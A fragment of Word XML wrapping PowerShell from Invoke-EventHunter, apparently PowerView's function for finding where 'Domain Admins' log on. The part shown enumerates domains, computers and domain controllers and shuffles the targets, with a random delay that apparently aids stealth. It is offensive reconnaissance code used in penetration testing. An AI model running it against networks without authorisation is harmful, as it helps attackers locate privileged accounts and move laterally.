    <w:p w14:paraId="5DED8080" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B67A6AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52726EE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B1559FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D299F4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50D0C10F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B3ADB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5DDEAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0F340A62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F1749" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58AD2283" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-EventHunter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511D103" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="178C1644" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743EEEB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D57DAC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E712CCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0C83A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="429E60C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3173E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF8FC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB6822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66CBF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AAFCD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB1F26F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54AE669D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A36A27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C4132" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDEBA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5A933" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22C8F367" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E8326" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69FC48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="060027D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F04C968" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF6903" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="355C3D7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF63AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = 'Domain Admins',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198F2B48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="247C1750" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47972DB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetServer,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC143D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A541C5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D121C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08E0A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="689E2919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B8F28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CFBAA9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0438CA07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB1FD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF18F3C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A10F4F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792B7D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2B214" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16968B5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="286CA642" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B32EC0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96596F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71F1BF7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624BA873" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A2ACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E98F14F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E40AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchDays = 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB46360" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F551FA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB67CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBA6802" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2334FFA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434064F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186D18AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58048E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47B38A69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1BB48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A8A88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697140EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38D47C72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB702AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69EE517B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8C315" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920EFF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA1DF5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30030BCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE81AEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DC813" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56D12996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-EventHunter"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31355189" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6585B9C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634EC4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4759F3C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E90C47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788DF79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F22371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C464A8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA67B95" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFC8BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424CAAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomains = @( (Get-NetDomain -Credential $Credential).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2280751E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3519B5B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="365C578A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9715DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322E72C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # First we build the host target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF57483" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75839EFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5576D168" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A4C74E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D6787" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using a host list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E9AD4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A9C47A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E358EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD78FC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($ComputerFilter -or $ComputerADSpath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B3C606" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC089E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287745D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE8081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -Filter $ComputerFilter -ADSpath $ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615487F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F0E3EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64D9BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E01C496" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # if a computer specifier isn't given, try to enumerate all domain controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF7D65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA496E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3FF493" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Querying domain $Domain for domain controllers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59968FA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object { $_.dnshostname}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0011FB39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF6F5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BFD200" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03E8063F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774453DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135208E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B26DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7E8337" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7C9ECA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE45BA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="659C5527" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397BAA4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58417D2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Now we build the user target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636C1770" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC19B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502C516" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
